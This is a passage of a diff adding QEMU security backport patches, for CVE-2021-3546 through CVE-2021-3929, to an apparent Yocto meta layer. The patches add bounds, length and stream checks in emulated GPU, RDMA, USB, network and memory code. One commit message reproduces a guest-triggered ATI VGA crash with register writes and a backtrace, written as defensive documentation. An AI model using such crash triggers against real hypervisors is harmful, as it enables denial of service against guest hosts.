+Signed-off-by: Gerd Hoffmann <kraxel@redhat.com>
+
+Upstream-Status: Backport
+CVE: CVE-2021-3546
+Signed-off-by: Armin Kuster <akuster@mvista.com>
+
+---
+ contrib/vhost-user-gpu/virgl.c | 4 ++++
+ 1 file changed, 4 insertions(+)
+
+Index: qemu-4.2.0/contrib/vhost-user-gpu/virgl.c
+===================================================================
+--- qemu-4.2.0.orig/contrib/vhost-user-gpu/virgl.c
++++ qemu-4.2.0/contrib/vhost-user-gpu/virgl.c
+@@ -174,6 +174,10 @@ virgl_cmd_get_capset(VuGpu *g,
+ 
+     virgl_renderer_get_cap_set(gc.capset_id, &max_ver,
+                                &max_size);
++    if (!max_size) {
++        cmd->error = VIRTIO_GPU_RESP_ERR_INVALID_PARAMETER;
++        return;
++    }
+     resp = g_malloc0(sizeof(*resp) + max_size);
+ 
+     resp->hdr.type = VIRTIO_GPU_RESP_OK_CAPSET;
diff --git a/meta/recipes-devtools/qemu/qemu/CVE-2021-3582.patch b/meta/recipes-devtools/qemu/qemu/CVE-2021-3582.patch
new file mode 100644
index 0000000000..7a88e29384
--- /dev/null
+++ b/meta/recipes-devtools/qemu/qemu/CVE-2021-3582.patch
@@ -0,0 +1,47 @@
+From 284f191b4abad213aed04cb0458e1600fd18d7c4 Mon Sep 17 00:00:00 2001
+From: Marcel Apfelbaum <marcel@redhat.com>
+Date: Wed, 16 Jun 2021 14:06:00 +0300
+Subject: [PATCH] hw/rdma: Fix possible mremap overflow in the pvrdma device
+ (CVE-2021-3582)
+
+Ensure mremap boundaries not trusting the guest kernel to
+pass the correct buffer length.
+
+Fixes: CVE-2021-3582
+Reported-by: VictorV (Kunlun Lab) <vv474172261@gmail.com>
+Tested-by: VictorV (Kunlun Lab) <vv474172261@gmail.com>
+Signed-off-by: Marcel Apfelbaum <marcel@redhat.com>
+Message-Id: <20210616110600.20889-1-marcel.apfelbaum@gmail.com>
+Reviewed-by: Yuval Shaia <yuval.shaia.ml@gmail.com>
+Tested-by: Yuval Shaia <yuval.shaia.ml@gmail.com>
+Reviewed-by: Prasad J Pandit <pjp@fedoraproject.org>
+Signed-off-by: Marcel Apfelbaum <marcel.apfelbaum@gmail.com>
+
+CVE: CVE-2021-3582
+Upstream-Status: Backport [284f191b4abad213aed04cb0458e1600fd18d7c4]
+Signed-off-by: Sakib Sajal <sakib.sajal@windriver.com>
+---
+ hw/rdma/vmw/pvrdma_cmd.c | 7 +++++++
+ 1 file changed, 7 insertions(+)
+
+diff --git a/hw/rdma/vmw/pvrdma_cmd.c b/hw/rdma/vmw/pvrdma_cmd.c
+index f59879e257..da7ddfa548 100644
+--- a/hw/rdma/vmw/pvrdma_cmd.c
++++ b/hw/rdma/vmw/pvrdma_cmd.c
+@@ -38,6 +38,13 @@ static void *pvrdma_map_to_pdir(PCIDevice *pdev, uint64_t pdir_dma,
+         return NULL;
+     }
+ 
++    length = ROUND_UP(length, TARGET_PAGE_SIZE);
++    if (nchunks * TARGET_PAGE_SIZE != length) {
++        rdma_error_report("Invalid nchunks/length (%u, %lu)", nchunks,
++                          (unsigned long)length);
++        return NULL;
++    }
++
+     dir = rdma_pci_dma_map(pdev, pdir_dma, TARGET_PAGE_SIZE);
+     if (!dir) {
+         rdma_error_report("Failed to map to page directory");
+-- 
+2.25.1
+
diff --git a/meta/recipes-devtools/qemu/qemu/CVE-2021-3607.patch b/meta/recipes-devtools/qemu/qemu/CVE-2021-3607.patch
new file mode 100644
index 0000000000..0547c74484
--- /dev/null
+++ b/meta/recipes-devtools/qemu/qemu/CVE-2021-3607.patch
@@ -0,0 +1,43 @@
+From 32e5703cfea07c91e6e84bcb0313f633bb146534 Mon Sep 17 00:00:00 2001
+From: Marcel Apfelbaum <marcel.apfelbaum@gmail.com>
+Date: Wed, 30 Jun 2021 14:46:34 +0300
+Subject: [PATCH] pvrdma: Ensure correct input on ring init (CVE-2021-3607)
+
+Check the guest passed a non zero page count
+for pvrdma device ring buffers.
+
+Fixes: CVE-2021-3607
+Reported-by: VictorV (Kunlun Lab) <vv474172261@gmail.com>
+Reviewed-by: VictorV (Kunlun Lab) <vv474172261@gmail.com>
+Signed-off-by: Marcel Apfelbaum <marcel@redhat.com>
+Message-Id: <20210630114634.2168872-1-marcel@redhat.com>
+Reviewed-by: Yuval Shaia <yuval.shaia.ml@gmail.com>
+Tested-by: Yuval Shaia <yuval.shaia.ml@gmail.com>
+Signed-off-by: Marcel Apfelbaum <marcel.apfelbaum@gmail.com>
+
+CVE: CVE-2021-3607
+Upstream-Status: Backport [32e5703cfea07c91e6e84bcb0313f633bb146534]
+Signed-off-by: Sakib Sajal <sakib.sajal@windriver.com>
+---
+ hw/rdma/vmw/pvrdma_main.c | 5 +++++
+ 1 file changed, 5 insertions(+)
+
+diff --git a/hw/rdma/vmw/pvrdma_main.c b/hw/rdma/vmw/pvrdma_main.c
+index 84ae8024fc..7c0c3551a8 100644
+--- a/hw/rdma/vmw/pvrdma_main.c
++++ b/hw/rdma/vmw/pvrdma_main.c
+@@ -92,6 +92,11 @@ static int init_dev_ring(PvrdmaRing *ring, PvrdmaRingState **ring_state,
+     uint64_t *dir, *tbl;
+     int rc = 0;
+ 
++    if (!num_pages) {
++        rdma_error_report("Ring pages count must be strictly positive");
++        return -EINVAL;
++    }
++
+     dir = rdma_pci_dma_map(pci_dev, dir_addr, TARGET_PAGE_SIZE);
+     if (!dir) {
+         rdma_error_report("Failed to map to page directory (ring %s)", name);
+-- 
+2.25.1
+
diff --git a/meta/recipes-devtools/qemu/qemu/CVE-2021-3608.patch b/meta/recipes-devtools/qemu/qemu/CVE-2021-3608.patch
new file mode 100644
index 0000000000..7055ec3d23
--- /dev/null
+++ b/meta/recipes-devtools/qemu/qemu/CVE-2021-3608.patch
@@ -0,0 +1,40 @@
+From 66ae37d8cc313f89272e711174a846a229bcdbd3 Mon Sep 17 00:00:00 2001
+From: Marcel Apfelbaum <marcel.apfelbaum@gmail.com>
+Date: Wed, 30 Jun 2021 14:52:46 +0300
+Subject: [PATCH] pvrdma: Fix the ring init error flow (CVE-2021-3608)
+MIME-Version: 1.0
+Content-Type: text/plain; charset=UTF-8
+Content-Transfer-Encoding: 8bit
+
+Do not unmap uninitialized dma addresses.
+
+Fixes: CVE-2021-3608
+Reviewed-by: VictorV (Kunlun Lab) <vv474172261@gmail.com>
+Tested-by: VictorV (Kunlun Lab) <vv474172261@gmail.com>
+Signed-off-by: Marcel Apfelbaum <marcel@redhat.com>
+Message-Id: <20210630115246.2178219-1-marcel@redhat.com>
+Tested-by: Yuval Shaia <yuval.shaia.ml@gmail.com>
+Reviewed-by: Yuval Shaia <yuval.shaia.ml@gmail.com>
+Reviewed-by: Philippe Mathieu-Daudé <philmd@redhat.com>
+Signed-off-by: Marcel Apfelbaum <marcel.apfelbaum@gmail.com>
+
+CVE: CVE-2021-3608
+Upstream-Status: Backport [66ae37d8cc313f89272e711174a846a229bcdbd3]
+Signed-off-by: Sakib Sajal <sakib.sajal@windriver.com>
+---
+ hw/rdma/vmw/pvrdma_dev_ring.c | 2 +-
+ 1 file changed, 1 insertion(+), 1 deletion(-)
+
+Index: qemu-4.2.0/hw/rdma/vmw/pvrdma_dev_ring.c
+===================================================================
+--- qemu-4.2.0.orig/hw/rdma/vmw/pvrdma_dev_ring.c
++++ qemu-4.2.0/hw/rdma/vmw/pvrdma_dev_ring.c
+@@ -41,7 +41,7 @@ int pvrdma_ring_init(PvrdmaRing *ring, c
+     atomic_set(&ring->ring_state->cons_head, 0);
+     */
+     ring->npages = npages;
+-    ring->pages = g_malloc(npages * sizeof(void *));
++    ring->pages = g_malloc0(npages * sizeof(void *));
+ 
+     for (i = 0; i < npages; i++) {
+         if (!tbl[i]) {
diff --git a/meta/recipes-devtools/qemu/qemu/CVE-2021-3638.patch b/meta/recipes-devtools/qemu/qemu/CVE-2021-3638.patch
new file mode 100644
index 0000000000..6e7af8540a
--- /dev/null
+++ b/meta/recipes-devtools/qemu/qemu/CVE-2021-3638.patch
@@ -0,0 +1,80 @@
+From b68d13531d8882ba66994b9f767b6a8f822464f3 Mon Sep 17 00:00:00 2001
+From: Vivek Kumbhar <vkumbhar@mvista.com>
+Date: Fri, 11 Nov 2022 12:43:26 +0530
+Subject: [PATCH] CVE-2021-3638
+
+Upstream-Status: Backport [https://lists.nongnu.org/archive/html/qemu-devel/2021-09/msg01682.html]
+CVE: CVE-2021-3638
+Signed-off-by: Vivek Kumbhar <vkumbhar@mvista.com>
+
+When building QEMU with DEBUG_ATI defined then running with
+'-device ati-vga,romfile="" -d unimp,guest_errors -trace ati\*'
+we get:
+
+  ati_mm_write 4 0x16c0 DP_CNTL <- 0x1
+  ati_mm_write 4 0x146c DP_GUI_MASTER_CNTL <- 0x2
+  ati_mm_write 4 0x16c8 DP_MIX <- 0xff0000
+  ati_mm_write 4 0x16c4 DP_DATATYPE <- 0x2
+  ati_mm_write 4 0x224 CRTC_OFFSET <- 0x0
+  ati_mm_write 4 0x142c DST_PITCH_OFFSET <- 0xfe00000
+  ati_mm_write 4 0x1420 DST_Y <- 0x3fff
+  ati_mm_write 4 0x1410 DST_HEIGHT <- 0x3fff
+  ati_mm_write 4 0x1588 DST_WIDTH_X <- 0x3fff3fff
+  ati_2d_blt: vram:0x7fff5fa00000 addr:0 ds:0x7fff61273800 stride:2560 bpp:32
+rop:0xff
+  ati_2d_blt: 0 0 0, 0 127 0, (0,0) -> (16383,16383) 16383x16383 > ^
+  ati_2d_blt: pixman_fill(dst:0x7fff5fa00000, stride:254, bpp:8, x:16383,
+y:16383, w:16383, h:16383, xor:0xff000000)
+  Thread 3 "qemu-system-i38" received signal SIGSEGV, Segmentation fault.
+  (gdb) bt
+  #0  0x00007ffff7f62ce0 in sse2_fill.lto_priv () at /lib64/libpixman-1.so.0
+  #1  0x00007ffff7f09278 in pixman_fill () at /lib64/libpixman-1.so.0
+  #2  0x0000555557b5a9af in ati_2d_blt (s=0x631000028800) at
+hw/display/ati_2d.c:196
+  #3  0x0000555557b4b5a2 in ati_mm_write (opaque=0x631000028800, addr=5512,
+data=1073692671, size=4) at hw/display/ati.c:843
+  #4  0x0000555558b90ec4 in memory_region_write_accessor (mr=0x631000039cc0,
+addr=5512, ..., size=4, ...) at softmmu/memory.c:492
+
+Commit 584acf34cb0 ("ati-vga: Fix reverse bit blts") introduced
+the local dst_x and dst_y which adjust the (x, y) coordinates
+depending on the direction in the SRCCOPY ROP3 operation, but
+forgot to address the same issue for the PATCOPY, BLACKNESS and
+WHITENESS operations, which also call pixman_fill().
+
+Fix that now by using the adjusted coordinates in the pixman_fill
+call, and update the related debug printf().
+---
+ hw/display/ati_2d.c | 6 +++---
+ 1 file changed, 3 insertions(+), 3 deletions(-)
+
+diff --git a/hw/display/ati_2d.c b/hw/display/ati_2d.c
+index 4dc10ea7..692bec91 100644
+--- a/hw/display/ati_2d.c
++++ b/hw/display/ati_2d.c
+@@ -84,7 +84,7 @@ void ati_2d_blt(ATIVGAState *s)
+     DPRINTF("%d %d %d, %d %d %d, (%d,%d) -> (%d,%d) %dx%d %c %c\n",
+             s->regs.src_offset, s->regs.dst_offset, s->regs.default_offset,
+             s->regs.src_pitch, s->regs.dst_pitch, s->regs.default_pitch,
+-            s->regs.src_x, s->regs.src_y, s->regs.dst_x, s->regs.dst_y,
++            s->regs.src_x, s->regs.src_y, dst_x, dst_y,
+             s->regs.dst_width, s->regs.dst_height,
+             (s->regs.dp_cntl & DST_X_LEFT_TO_RIGHT ? '>' : '<'),
+             (s->regs.dp_cntl & DST_Y_TOP_TO_BOTTOM ? 'v' : '^'));
+@@ -180,11 +180,11 @@ void ati_2d_blt(ATIVGAState *s)
+         dst_stride /= sizeof(uint32_t);
+         DPRINTF("pixman_fill(%p, %d, %d, %d, %d, %d, %d, %x)\n",
+                 dst_bits, dst_stride, bpp,
+-                s->regs.dst_x, s->regs.dst_y,
++                dst_x, dst_y,
+                 s->regs.dst_width, s->regs.dst_height,
+                 filler);
+         pixman_fill((uint32_t *)dst_bits, dst_stride, bpp,
+-                    s->regs.dst_x, s->regs.dst_y,
++                    dst_x, dst_y,
+                     s->regs.dst_width, s->regs.dst_height,
+                     filler);
+         if (dst_bits >= s->vga.vram_ptr + s->vga.vbe_start_addr &&
+-- 
+2.25.1
+
diff --git a/meta/recipes-devtools/qemu/qemu/CVE-2021-3682.patch b/meta/recipes-devtools/qemu/qemu/CVE-2021-3682.patch
new file mode 100644
index 0000000000..50a49233d3
--- /dev/null
+++ b/meta/recipes-devtools/qemu/qemu/CVE-2021-3682.patch
@@ -0,0 +1,41 @@
+From 5e796671e6b8d5de4b0b423dce1b3eba144a92c9 Mon Sep 17 00:00:00 2001
+From: Gerd Hoffmann <kraxel@redhat.com>
+Date: Thu, 22 Jul 2021 09:27:56 +0200
+Subject: [PATCH] usbredir: fix free call
+MIME-Version: 1.0
+Content-Type: text/plain; charset=UTF-8
+Content-Transfer-Encoding: 8bit
+
+data might point into the middle of a larger buffer, there is a separate
+free_on_destroy pointer passed into bufp_alloc() to handle that.  It is
+only used in the normal workflow though, not when dropping packets due
+to the queue being full.  Fix that.
+
+Resolves: https://gitlab.com/qemu-project/qemu/-/issues/491
+Signed-off-by: Gerd Hoffmann <kraxel@redhat.com>
+Reviewed-by: Marc-André Lureau <marcandre.lureau@redhat.com>
+Message-Id: <20210722072756.647673-1-kraxel@redhat.com>
+
+CVE: CVE-2021-3682
+Upstream-Status: Backport [5e796671e6b8d5de4b0b423dce1b3eba144a92c9]
+Signed-off-by: Sakib Sajal <sakib.sajal@windriver.com>
+---
+ hw/usb/redirect.c | 2 +-
+ 1 file changed, 1 insertion(+), 1 deletion(-)
+
+diff --git a/hw/usb/redirect.c b/hw/usb/redirect.c
+index 4ec9326e05..1ec909a63a 100644
+--- a/hw/usb/redirect.c
++++ b/hw/usb/redirect.c
+@@ -476,7 +476,7 @@ static int bufp_alloc(USBRedirDevice *dev, uint8_t *data, uint16_t len,
+     if (dev->endpoint[EP2I(ep)].bufpq_dropping_packets) {
+         if (dev->endpoint[EP2I(ep)].bufpq_size >
+                 dev->endpoint[EP2I(ep)].bufpq_target_size) {
+-            free(data);
++            free(free_on_destroy);
+             return -1;
+         }
+         dev->endpoint[EP2I(ep)].bufpq_dropping_packets = 0;
+-- 
+2.25.1
+
diff --git a/meta/recipes-devtools/qemu/qemu/CVE-2021-3713.patch b/meta/recipes-devtools/qemu/qemu/CVE-2021-3713.patch
new file mode 100644
index 0000000000..cdd9c38db9
--- /dev/null
+++ b/meta/recipes-devtools/qemu/qemu/CVE-2021-3713.patch
@@ -0,0 +1,67 @@
+From a114d6baedf2cccb454a46d36e399fec1bc3e1c0 Mon Sep 17 00:00:00 2001
+From: Gerd Hoffmann <kraxel@redhat.com>
+Date: Wed, 18 Aug 2021 14:05:05 +0200
+Subject: [PATCH] uas: add stream number sanity checks.
+MIME-Version: 1.0
+Content-Type: text/plain; charset=UTF-8
+Content-Transfer-Encoding: 8bit
+
+MIME-Version: 1.0
+Content-Type: text/plain; charset=UTF-8
+Content-Transfer-Encoding: 8bit
+
+The device uses the guest-supplied stream number unchecked, which can
+lead to guest-triggered out-of-band access to the UASDevice->data3 and
+UASDevice->status3 fields.  Add the missing checks.
+
+Fixes: CVE-2021-3713
+Signed-off-by: Gerd Hoffmann <kraxel@redhat.com>
+Reported-by: Chen Zhe <chenzhe@huawei.com>
+Reported-by: Tan Jingguo <tanjingguo@huawei.com>
+Reviewed-by: Philippe Mathieu-Daudé <philmd@redhat.com>
+Message-Id: <20210818120505.1258262-2-kraxel@redhat.com>
+
+https://gitlab.com/qemu-project/qemu/-/commit/13b250b12ad3c59114a6a17d59caf073ce45b33a
+CVE: CVE-2021-3713
+Upstream-Status: Backport
+Signed-off-by: Chee Yang Lee <chee.yang.lee@intel.com>
+---
+ hw/usb/dev-uas.c | 11 +++++++++++
+ 1 file changed, 11 insertions(+)
+
+diff --git a/hw/usb/dev-uas.c b/hw/usb/dev-uas.c
+index 6d6d1073..0b8cd4dd 100644
+--- a/hw/usb/dev-uas.c
++++ b/hw/usb/dev-uas.c
+@@ -830,6 +830,9 @@ static void usb_uas_handle_data(USBDevice *dev, USBPacket *p)
+         }
+         break;
+     case UAS_PIPE_ID_STATUS:
++        if (p->stream > UAS_MAX_STREAMS) {
++            goto err_stream;
++        }
+         if (p->stream) {
+             QTAILQ_FOREACH(st, &uas->results, next) {
+                 if (st->stream == p->stream) {
+@@ -857,6 +860,9 @@ static void usb_uas_handle_data(USBDevice *dev, USBPacket *p)
+         break;
+     case UAS_PIPE_ID_DATA_IN:
+     case UAS_PIPE_ID_DATA_OUT:
++        if (p->stream > UAS_MAX_STREAMS) {
++            goto err_stream;
++        }
+         if (p->stream) {
+             req = usb_uas_find_request(uas, p->stream);
+         } else {
+@@ -892,6 +898,11 @@ static void usb_uas_handle_data(USBDevice *dev, USBPacket *p)
+         p->status = USB_RET_STALL;
+         break;
+     }
++
++err_stream:
++    error_report("%s: invalid stream %d", __func__, p->stream);
++    p->status = USB_RET_STALL;
++    return;
+ }
+ 
+ static void usb_uas_unrealize(USBDevice *dev, Error **errp)
diff --git a/meta/recipes-devtools/qemu/qemu/CVE-2021-3748.patch b/meta/recipes-devtools/qemu/qemu/CVE-2021-3748.patch
new file mode 100644
index 0000000000..b291ade4e3
--- /dev/null
+++ b/meta/recipes-devtools/qemu/qemu/CVE-2021-3748.patch
@@ -0,0 +1,124 @@
+From bedd7e93d01961fcb16a97ae45d93acf357e11f6 Mon Sep 17 00:00:00 2001
+From: Jason Wang <jasowang@redhat.com>
+Date: Thu, 2 Sep 2021 13:44:12 +0800
+Subject: [PATCH] virtio-net: fix use after unmap/free for sg
+
+When mergeable buffer is enabled, we try to set the num_buffers after
+the virtqueue elem has been unmapped. This will lead several issues,
+E.g a use after free when the descriptor has an address which belongs
+to the non direct access region. In this case we use bounce buffer
+that is allocated during address_space_map() and freed during
+address_space_unmap().
+
+Fixing this by storing the elems temporarily in an array and delay the
+unmap after we set the the num_buffers.
+
+This addresses CVE-2021-3748.
+
+Reported-by: Alexander Bulekov <alxndr@bu.edu>
+Fixes: fbe78f4f55c6 ("virtio-net support")
+Cc: qemu-stable@nongnu.org
+Signed-off-by: Jason Wang <jasowang@redhat.com>
+
+https://github.com/qemu/qemu/commit/bedd7e93d01961fcb16a97ae45d93acf357e11f6
+CVE: CVE-2021-3748
+Upstream-Status: Backport
+Signed-off-by: Chee Yang Lee <chee.yang.lee@intel.com>
+---
+ hw/net/virtio-net.c | 39 ++++++++++++++++++++++++++++++++-------
+ 1 file changed, 32 insertions(+), 7 deletions(-)
+
+diff --git a/hw/net/virtio-net.c b/hw/net/virtio-net.c
+index 16d20cdee52a..f205331dcf8c 100644
+--- a/hw/net/virtio-net.c
++++ b/hw/net/virtio-net.c
+@@ -1746,10 +1746,13 @@ static ssize_t virtio_net_receive_rcu(NetClientState *nc, const uint8_t *buf,
+     VirtIONet *n = qemu_get_nic_opaque(nc);
+     VirtIONetQueue *q = virtio_net_get_subqueue(nc);
+     VirtIODevice *vdev = VIRTIO_DEVICE(n);
++    VirtQueueElement *elems[VIRTQUEUE_MAX_SIZE];
++    size_t lens[VIRTQUEUE_MAX_SIZE];
+     struct iovec mhdr_sg[VIRTQUEUE_MAX_SIZE];
+     struct virtio_net_hdr_mrg_rxbuf mhdr;
+     unsigned mhdr_cnt = 0;
+-    size_t offset, i, guest_offset;
++    size_t offset, i, guest_offset, j;
++    ssize_t err;
+ 
+     if (!virtio_net_can_receive(nc)) {
+         return -1;
+@@ -1780,6 +1783,12 @@ static ssize_t virtio_net_receive_rcu(NetClientState *nc, const uint8_t *buf,
+ 
+         total = 0;
+ 
++        if (i == VIRTQUEUE_MAX_SIZE) {
++            virtio_error(vdev, "virtio-net unexpected long buffer chain");
++            err = size;
++            goto err;
++        }
++
+         elem = virtqueue_pop(q->rx_vq, sizeof(VirtQueueElement));
+         if (!elem) {
+             if (i) {
+@@ -1791,7 +1800,8 @@ static ssize_t virtio_net_receive_rcu(NetClientState *nc, const uint8_t *buf,
+                              n->guest_hdr_len, n->host_hdr_len,
+                              vdev->guest_features);
+             }
+-            return -1;
++            err = -1;
++            goto err;
+         }
+ 
+         if (elem->in_num < 1) {
+@@ -1799,7 +1809,8 @@ static ssize_t virtio_net_receive_rcu(NetClientState *nc, const uint8_t *buf,
+                          "virtio-net receive queue contains no in buffers");
+             virtqueue_detach_element(q->rx_vq, elem, 0);
+             g_free(elem);
+-            return -1;
++            err = -1;
++            goto err;
+         }
+ 
+         sg = elem->in_sg;
+@@ -1836,12 +1847,13 @@ static ssize_t virtio_net_receive_rcu(NetClientState *nc, const uint8_t *buf,
+         if (!n->mergeable_rx_bufs && offset < size) {
+             virtqueue_unpop(q->rx_vq, elem, total);
+             g_free(elem);
+-            return size;
++            err = size;
++            goto err;
+         }
+ 
+-        /* signal other side */
+-        virtqueue_fill(q->rx_vq, elem, total, i++);
+-        g_free(elem);
++        elems[i] = elem;
++        lens[i] = total;
++        i++;
+     }
+ 
+     if (mhdr_cnt) {
+@@ -1851,10 +1863,23 @@ static ssize_t virtio_net_receive_rcu(NetClientState *nc, const uint8_t *buf,
+                      &mhdr.num_buffers, sizeof mhdr.num_buffers);
+     }
+ 
++    for (j = 0; j < i; j++) {
++        /* signal other side */
++        virtqueue_fill(q->rx_vq, elems[j], lens[j], j);
++        g_free(elems[j]);
++    }
++
+     virtqueue_flush(q->rx_vq, i);
+     virtio_notify(vdev, q->rx_vq);
+ 
+     return size;
++
++err:
++    for (j = 0; j < i; j++) {
++        g_free(elems[j]);
++    }
++
++    return err;
+ }
+ 
+ static ssize_t virtio_net_do_receive(NetClientState *nc, const uint8_t *buf,
diff --git a/meta/recipes-devtools/qemu/qemu/CVE-2021-3750.patch b/meta/recipes-devtools/qemu/qemu/CVE-2021-3750.patch
new file mode 100644
index 0000000000..43630e71fb
--- /dev/null
+++ b/meta/recipes-devtools/qemu/qemu/CVE-2021-3750.patch
@@ -0,0 +1,180 @@
+From 1938fbc7ec197e2612ab2ce36dd69bff19208aa5 Mon Sep 17 00:00:00 2001
+From: Hitendra Prajapati <hprajapati@mvista.com>
+Date: Mon, 10 Oct 2022 17:44:41 +0530
+Subject: [PATCH] CVE-2021-3750
+
+Upstream-Status: Backport [https://git.qemu.org/?p=qemu.git;a=commit;h=b9d383ab797f54ae5fa8746117770709921dc529 && https://git.qemu.org/?p=qemu.git;a=commit;h=3ab6fdc91b72e156da22848f0003ff4225690ced && https://git.qemu.org/?p=qemu.git;a=commit;h=58e74682baf4e1ad26b064d8c02e5bc99c75c5d9]
+CVE: CVE-2021-3750
+Signed-off-by: Hitendra Prajapati <hprajapati@mvista.com>
+---
+ exec.c                     | 55 +++++++++++++++++++++++++++++++-------
+ hw/intc/arm_gicv3_redist.c |  4 +--
+ include/exec/memattrs.h    |  9 +++++++
+ 3 files changed, 56 insertions(+), 12 deletions(-)
+
+diff --git a/exec.c b/exec.c
+index 1360051a..10581d8d 100644
+--- a/exec.c
++++ b/exec.c
+@@ -39,6 +39,7 @@
+ #include "qemu/config-file.h"
+ #include "qemu/error-report.h"
+ #include "qemu/qemu-print.h"
++#include "qemu/log.h"
+ #if defined(CONFIG_USER_ONLY)
+ #include "qemu.h"
+ #else /* !CONFIG_USER_ONLY */
+@@ -3118,6 +3119,33 @@ static bool prepare_mmio_access(MemoryRegion *mr)
+     return release_lock;
+ }
+ 
++/**
+++ * flatview_access_allowed
+++ * @mr: #MemoryRegion to be accessed
+++ * @attrs: memory transaction attributes
+++ * @addr: address within that memory region
+++ * @len: the number of bytes to access
+++ *
+++ * Check if a memory transaction is allowed.
+++ *
+++ * Returns: true if transaction is allowed, false if denied.
+++ */
++static bool flatview_access_allowed(MemoryRegion *mr, MemTxAttrs attrs,
++                                    hwaddr addr, hwaddr len)
++{
++    if (likely(!attrs.memory)) {
++        return true;
++    }
++    if (memory_region_is_ram(mr)) {
++        return true;
++    }
++    qemu_log_mask(LOG_GUEST_ERROR,
++                  "Invalid access to non-RAM device at "
++                  "addr 0x%" HWADDR_PRIX ", size %" HWADDR_PRIu ", "
++                  "region '%s'\n", addr, len, memory_region_name(mr));
++    return false;
++}
++
+ /* Called within RCU critical section.  */
+ static MemTxResult flatview_write_continue(FlatView *fv, hwaddr addr,
+                                            MemTxAttrs attrs,
+@@ -3131,7 +3159,10 @@ static MemTxResult flatview_write_continue(FlatView *fv, hwaddr addr,
+     bool release_lock = false;
+ 
+     for (;;) {
+-        if (!memory_access_is_direct(mr, true)) {
++	if (!flatview_access_allowed(mr, attrs, addr1, l)) {
++            result |= MEMTX_ACCESS_ERROR;
++            /* Keep going. */
++        } else if (!memory_access_is_direct(mr, true)) {
+             release_lock |= prepare_mmio_access(mr);
+             l = memory_access_size(mr, l, addr1);
+             /* XXX: could force current_cpu to NULL to avoid
+@@ -3173,14 +3204,14 @@ static MemTxResult flatview_write(FlatView *fv, hwaddr addr, MemTxAttrs attrs,
+     hwaddr l;
+     hwaddr addr1;
+     MemoryRegion *mr;
+-    MemTxResult result = MEMTX_OK;
+ 
+     l = len;
+     mr = flatview_translate(fv, addr, &addr1, &l, true, attrs);
+-    result = flatview_write_continue(fv, addr, attrs, buf, len,
+-                                     addr1, l, mr);
+-
+-    return result;
++    if (!flatview_access_allowed(mr, attrs, addr, len)) {
++        return MEMTX_ACCESS_ERROR;
++    }
++    return flatview_write_continue(fv, addr, attrs, buf, len,
++                                   addr1, l, mr);
+ }
+ 
+ /* Called within RCU critical section.  */
+@@ -3195,7 +3226,10 @@ MemTxResult flatview_read_continue(FlatView *fv, hwaddr addr,
+     bool release_lock = false;
+ 
+     for (;;) {
+-        if (!memory_access_is_direct(mr, false)) {
++        if (!flatview_access_allowed(mr, attrs, addr1, l)) {
++            result |= MEMTX_ACCESS_ERROR;
++            /* Keep going. */
++        } else if (!memory_access_is_direct(mr, false)) {
+             /* I/O case */
+             release_lock |= prepare_mmio_access(mr);
+             l = memory_access_size(mr, l, addr1);
+@@ -3238,6 +3272,9 @@ static MemTxResult flatview_read(FlatView *fv, hwaddr addr,
+ 
+     l = len;
+     mr = flatview_translate(fv, addr, &addr1, &l, false, attrs);
++    if (!flatview_access_allowed(mr, attrs, addr, len)) {
++        return MEMTX_ACCESS_ERROR;
++    }
+     return flatview_read_continue(fv, addr, attrs, buf, len,
+                                   addr1, l, mr);
+ }
+@@ -3474,12 +3511,10 @@ bool address_space_access_valid(AddressSpace *as, hwaddr addr,
+                                 MemTxAttrs attrs)
+ {
+     FlatView *fv;
+-    bool result;
+ 
+     RCU_READ_LOCK_GUARD();
+     fv = address_space_to_flatview(as);
+-    result = flatview_access_valid(fv, addr, len, is_write, attrs);
+-    return result;
++    return flatview_access_valid(fv, addr, len, is_write, attrs);
+ }
+ 
+ static hwaddr
+diff --git a/hw/intc/arm_gicv3_redist.c b/hw/intc/arm_gicv3_redist.c
+index 8645220d..44368e28 100644
+--- a/hw/intc/arm_gicv3_redist.c
++++ b/hw/intc/arm_gicv3_redist.c
+@@ -450,7 +450,7 @@ MemTxResult gicv3_redist_read(void *opaque, hwaddr offset, uint64_t *data,
+         break;
+     }
+ 
+-    if (r == MEMTX_ERROR) {
++    if (r != MEMTX_OK) {
+         qemu_log_mask(LOG_GUEST_ERROR,
+                       "%s: invalid guest read at offset " TARGET_FMT_plx
+                       "size %u\n", __func__, offset, size);
+@@ -507,7 +507,7 @@ MemTxResult gicv3_redist_write(void *opaque, hwaddr offset, uint64_t data,
+         break;
+     }
+ 
+-    if (r == MEMTX_ERROR) {
++    if (r != MEMTX_OK) {
+         qemu_log_mask(LOG_GUEST_ERROR,
+                       "%s: invalid guest write at offset " TARGET_FMT_plx
+                       "size %u\n", __func__, offset, size);
+diff --git a/include/exec/memattrs.h b/include/exec/memattrs.h
+index 95f2d20d..9fb98bc1 100644
+--- a/include/exec/memattrs.h
++++ b/include/exec/memattrs.h
+@@ -35,6 +35,14 @@ typedef struct MemTxAttrs {
+     unsigned int secure:1;
+     /* Memory access is usermode (unprivileged) */
+     unsigned int user:1;
++    /*
++     * Bus interconnect and peripherals can access anything (memories,
++     * devices) by default. By setting the 'memory' bit, bus transaction
++     * are restricted to "normal" memories (per the AMBA documentation)
++     * versus devices. Access to devices will be logged and rejected
++     * (see MEMTX_ACCESS_ERROR).
++     */
++    unsigned int memory:1;
+     /* Requester ID (for MSI for example) */
+     unsigned int requester_id:16;
+     /* Invert endianness for this page */
+@@ -66,6 +74,7 @@ typedef struct MemTxAttrs {
+ #define MEMTX_OK 0
+ #define MEMTX_ERROR             (1U << 0) /* device returned an error */
+ #define MEMTX_DECODE_ERROR      (1U << 1) /* nothing at that address */
++#define MEMTX_ACCESS_ERROR      (1U << 2) /* access denied */
+ typedef uint32_t MemTxResult;
+ 
+ #endif
+-- 
+2.25.1
+
diff --git a/meta/recipes-devtools/qemu/qemu/CVE-2021-3929.patch b/meta/recipes-devtools/qemu/qemu/CVE-2021-3929.patch
new file mode 100644
index 0000000000..a1862f1226
--- /dev/null
+++ b/meta/recipes-devtools/qemu/qemu/CVE-2021-3929.patch
@@ -0,0 +1,81 @@
+From 2c682b5975b41495f98cc34b8243042c446eec44 Mon Sep 17 00:00:00 2001
+From: Gaurav Gupta <gauragup@cisco.com>
+Date: Wed, 29 Mar 2023 14:36:16 -0700
+Subject: [PATCH] hw/nvme: fix CVE-2021-3929 MIME-Version: 1.0 Content-Type:
+ text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit
+MIME-Version: 1.0
+Content-Type: text/plain; charset=UTF-8
+Content-Transfer-Encoding: 8bit
+
+This fixes CVE-2021-3929 "locally" by denying DMA to the iomem of the
